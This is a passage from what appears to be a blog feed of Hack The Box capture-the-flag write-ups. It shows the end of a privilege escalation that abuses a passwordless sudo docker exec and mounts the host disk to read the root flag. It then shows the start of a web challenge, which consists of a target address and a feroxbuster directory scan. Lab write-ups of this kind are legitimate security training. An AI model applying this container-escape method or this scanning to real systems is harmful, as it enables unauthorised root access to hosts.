data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/50f08533-e566-4b66-ba85-aaa6cd4f7af0_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:258446,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193450322?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F71c145d7-884f-4a7c-a912-653ce4013583_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!oc24!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50f08533-e566-4b66-ba85-aaa6cd4f7af0_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!oc24!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50f08533-e566-4b66-ba85-aaa6cd4f7af0_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!oc24!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50f08533-e566-4b66-ba85-aaa6cd4f7af0_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!oc24!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50f08533-e566-4b66-ba85-aaa6cd4f7af0_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>It&#8217;s a Docker Exec.</p><ol start="7"><li><p><em>internal Enumeration and Escalation Effort</em></p></li></ol><p>Let&#8217;s see from inside:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">boris@data:~$ id
uid=1001(boris) gid=1001(boris) groups=1001(boris)</code></pre></div><p>Let&#8217;s abuse the no-passwd:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">boris@data:~$ sudo /snap/bin/docker exec -h
Flag shorthand -h has been deprecated, please use --help

Usage:  docker exec [OPTIONS] CONTAINER COMMAND [ARG...]

Run a command in a running container

Options:
  -d, --detach               Detached mode: run command in the background
      --detach-keys string   Override the key sequence for detaching a container
  -e, --env list             Set environment variables
      --env-file list        Read in a file of environment variables
  -i, --interactive          Keep STDIN open even if not attached
      --privileged           Give extended privileges to the command
  -t, --tty                  Allocate a pseudo-TTY
  -u, --user string          Username or UID (format: &lt;name|uid&gt;[:&lt;group|gid&gt;])
  -w, --workdir string       Working directory inside the container
boris@data:~$ sudo /snap/bin/docker exec -it -u 0 grafana /bin/bash
bash-5.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
bash-5.1# whoami
root</code></pre></div><p>Wow! we&#8217;re root already, however this is Docker root.</p><p>After bit of Enumeration and trying around:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">bash-5.1# cd /var
. . .[SNIP]. . .
drwxr-xr-x    1 root     root          4096 Jan 23  2022 ..
bash-5.1# ps aux
PID   USER     TIME  COMMAND
    1 grafana   0:09 grafana-server --homepath=/usr/share/grafana --config=/etc/grafana/grafana.ini --packaging=docker cfg:default.log.mode=console cfg:default.paths.data=/var/lib/grafana cfg:de
   27 root      0:00 /bin/bash
   44 root      0:00 ps aux
bash-5.1# ss -tunlp
bash: ss: command not found
bash-5.1# cd /
. . .[SNIP]. . .
bash-5.1# cd dev
bash-5.1# ls
agpgart          kmsg             net              sg0              tty15            tty28            tty40            tty53            tty9             vcs5             vcsu5
autofs           loop-control     null             shm              tty16            tty29            tty41            tty54            ttyS0            vcs6             vcsu6
bsg              loop0            nvram            snapshot         tty17            tty3             tty42            tty55            ttyS1            vcsa             vfio
btrfs-control    loop1            port             stderr           tty18            tty30            tty43            tty56            ttyS2            vcsa1            vga_arbiter
core             loop2            ppp              stdin            tty19            tty31            tty44            tty57            ttyS3            vcsa2            vhost-net
cpu_dma_latency  loop3            psaux            stdout           tty2             tty32            tty45            tty58            ttyprintk        vcsa3            vhost-vsock
cuse             loop4            ptmx             tty              tty20            tty33            tty46            tty59            udmabuf          vcsa4            vmci
ecryptfs         loop5            pts              tty0             tty21            tty34            tty47            tty6             uinput           vcsa5            vsock
fd               loop6            random           tty1             tty22            tty35            tty48            tty60            urandom          vcsa6            zero
full             loop7            rfkill           tty10            tty23            tty36            tty49            tty61            vcs              vcsu             zfs
fuse             mapper           rtc0             tty11            tty24            tty37            tty5             tty62            vcs1             vcsu1
hpet             mcelog           sda              tty12            tty25            tty38            tty50            tty63            vcs2             vcsu2
hwrng            mem              sda1             tty13            tty26            tty39            tty51            tty7             vcs3             vcsu3
input            mqueue           sda2             tty14            tty27            tty4             tty52            tty8             vcs4             vcsu4</code></pre></div><p>I decide to create a mount, request a root access file to me:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">bash-5.1# mount sda1 /mnt
bash-5.1# ls mnt
ls: mnt: No such file or directory
bash-5.1# cd ..
bash-5.1# ls mnt
bin             etc             initrd.img.old  lost+found      opt             run             srv             usr             vmlinuz.old
boot            home            lib             media           proc            sbin            sys             var
dev             initrd.img      lib64           mnt             root            snap            tmp             vmlinuz
bash-5.1# ls -al /mnt/
total 112
drwxr-xr-x   23 root     root          4096 Jun  4  2025 .
drwxr-xr-x    1 root     root          4096 Jan 23  2022 ..
. . .[SNIP]. . .
drwxr-xr-x    2 root     root          4096 Nov 29  2021 srv
drwxr-xr-x    2 root     root          4096 Apr 24  2018 sys
drwxrwxrwt   11 root     root          4096 Apr  7 11:08 tmp
drwxr-xr-x   10 root     root          4096 Apr  9  2025 usr
drwxr-xr-x   13 root     root          4096 Nov 29  2021 var
lrwxrwxrwx    1 root     root            27 Apr  9  2025 vmlinuz -&gt; boot/vmlinuz-5.4.0-1103-aws
lrwxrwxrwx    1 root     root            27 Jun  4  2025 vmlinuz.old -&gt; boot/vmlinuz-5.4.0-1103-aws
bash-5.1# cat /mnt/root/root.txt 
386e38ac17bbfc1f893c1337bd9bcc99
bash-5.1#</code></pre></div><p>That&#8217;s it!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!xCkY!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb1af3801-9199-4d4e-a1f9-36c7156f4e9c_880x370.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!xCkY!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb1af3801-9199-4d4e-a1f9-36c7156f4e9c_880x370.png 424w, https://substackcdn.com/image/fetch/$s_!xCkY!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb1af3801-9199-4d4e-a1f9-36c7156f4e9c_880x370.png 848w, https://substackcdn.com/image/fetch/$s_!xCkY!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb1af3801-9199-4d4e-a1f9-36c7156f4e9c_880x370.png 1272w, https://substackcdn.com/image/fetch/$s_!xCkY!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb1af3801-9199-4d4e-a1f9-36c7156f4e9c_880x370.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!xCkY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb1af3801-9199-4d4e-a1f9-36c7156f4e9c_880x370.png" width="880" height="370" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b1af3801-9199-4d4e-a1f9-36c7156f4e9c_880x370.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:370,&quot;width&quot;:880,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:83460,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193450322?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb1af3801-9199-4d4e-a1f9-36c7156f4e9c_880x370.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!xCkY!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb1af3801-9199-4d4e-a1f9-36c7156f4e9c_880x370.png 424w, https://substackcdn.com/image/fetch/$s_!xCkY!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb1af3801-9199-4d4e-a1f9-36c7156f4e9c_880x370.png 848w, https://substackcdn.com/image/fetch/$s_!xCkY!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb1af3801-9199-4d4e-a1f9-36c7156f4e9c_880x370.png 1272w, https://substackcdn.com/image/fetch/$s_!xCkY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb1af3801-9199-4d4e-a1f9-36c7156f4e9c_880x370.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ul><li><p><a href="https://labs.hackthebox.com/achievement/machine/2489228/673">labs.hackthebox.com/achievement/machine/2489228/673</a></p></li></ul><p>Happy Hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[HTB NovaEnergy - Web]]></title><description><![CDATA[Info: NovaEnergy is a internal web application used for file sharing system. This site can only be accessed by employee of NovaEnergy company.]]></description><link>https://byt3n33dl3.substack.com/p/htb-novaenergy-web</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/htb-novaenergy-web</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Thu, 02 Apr 2026 08:42:16 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!INOh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fce6f6b5e-ff7b-418c-aa71-ca7f10e47d2b_880x388.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!INOh!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fce6f6b5e-ff7b-418c-aa71-ca7f10e47d2b_880x388.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!INOh!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fce6f6b5e-ff7b-418c-aa71-ca7f10e47d2b_880x388.png 424w, https://substackcdn.com/image/fetch/$s_!INOh!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fce6f6b5e-ff7b-418c-aa71-ca7f10e47d2b_880x388.png 848w, https://substackcdn.com/image/fetch/$s_!INOh!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fce6f6b5e-ff7b-418c-aa71-ca7f10e47d2b_880x388.png 1272w, https://substackcdn.com/image/fetch/$s_!INOh!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fce6f6b5e-ff7b-418c-aa71-ca7f10e47d2b_880x388.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!INOh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fce6f6b5e-ff7b-418c-aa71-ca7f10e47d2b_880x388.png" width="880" height="388" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ce6f6b5e-ff7b-418c-aa71-ca7f10e47d2b_880x388.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:388,&quot;width&quot;:880,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:153977,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192936305?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fce6f6b5e-ff7b-418c-aa71-ca7f10e47d2b_880x388.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!INOh!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fce6f6b5e-ff7b-418c-aa71-ca7f10e47d2b_880x388.png 424w, https://substackcdn.com/image/fetch/$s_!INOh!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fce6f6b5e-ff7b-418c-aa71-ca7f10e47d2b_880x388.png 848w, https://substackcdn.com/image/fetch/$s_!INOh!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fce6f6b5e-ff7b-418c-aa71-ca7f10e47d2b_880x388.png 1272w, https://substackcdn.com/image/fetch/$s_!INOh!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fce6f6b5e-ff7b-418c-aa71-ca7f10e47d2b_880x388.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>NovaEnergy (API Attack)</h2><p>NovaEnergy is a internal web application used for file sharing system. This site can only be accessed by employee of NovaEnergy company. </p><p>You're tasked to hunt for any vulnerabilities that led to any breaches in their site.</p><p>Target:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">154.57.164.74:30838</code></pre></div><p>UI:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!crkK!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aaece24-536e-401f-8ffe-041f7a82faf6_1588x963.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!crkK!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aaece24-536e-401f-8ffe-041f7a82faf6_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!crkK!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aaece24-536e-401f-8ffe-041f7a82faf6_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!crkK!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aaece24-536e-401f-8ffe-041f7a82faf6_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!crkK!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aaece24-536e-401f-8ffe-041f7a82faf6_1588x963.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!crkK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aaece24-536e-401f-8ffe-041f7a82faf6_1588x963.png" width="1456" height="883" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1aaece24-536e-401f-8ffe-041f7a82faf6_1588x963.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:883,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:209257,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192936305?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aaece24-536e-401f-8ffe-041f7a82faf6_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!crkK!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aaece24-536e-401f-8ffe-041f7a82faf6_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!crkK!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aaece24-536e-401f-8ffe-041f7a82faf6_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!crkK!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aaece24-536e-401f-8ffe-041f7a82faf6_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!crkK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1aaece24-536e-401f-8ffe-041f7a82faf6_1588x963.png 1456w" sizes="100vw"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Let&#8217;s Feroxbuster first:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo feroxbuster -u http://154.57.164.74:30838 --filter-status 404
                                                                                                                                                                                                   
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher &#129299;                 ver: 2.13.1
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
 &#127919;  Target Url            &#9474; http://154.57.164.74:30838/
 &#128681;  In-Scope Url          &#9474; 154.57.164.74
 &#128640;  Threads               &#9474; 50
 &#128214;  Wordlist              &#9474; /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 &#128162;  Status Code Filters   &#9474; [404]
 &#128165;  Timeout (secs)        &#9474; 7
 &#129441;  User-Agent            &#9474; feroxbuster/2.13.1
 &#128137;  Config File           &#9474; /etc/feroxbuster/ferox-config.toml
 &#128270;  Extract Links         &#9474; true
 &#127937;  HTTP methods          &#9474; [GET]
 &#128259;  Recursion Depth       &#9474; 4
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
 &#127937;  Press [ENTER] to use the Scan Management Menu&#8482;
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
404      GET        5l       31w      207c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET       83l      179w     3224c http://154.57.164.74:30838/register
200      GET       81l      161w     2915c http://154.57.164.74:30838/login
301      GET        7l       11w      169c http://154.57.164.74:30838/api =&gt; http://154.57.164.74/api/
200      GET      272l      801w     9474c http://154.57.164.74:30838/static/auth.js
200      GET      145l      395w     4513c http://154.57.164.74:30838/static/utils.js
200      GET      122l      313w     3435c http://154.57.164.74:30838/static/api.js
302      GET        5l       22w      199c http://154.57.164.74:30838/upload =&gt; http://154.57.164.74:30838/login
200      GET      108l      304w     3882c http://154.57.164.74:30838/static/logout.js
200      GET       44l       77w     1313c http://154.57.164.74:30838/logout
200      GET      879l     2306w    29621c http://154.57.164.74:30838/static/script.js
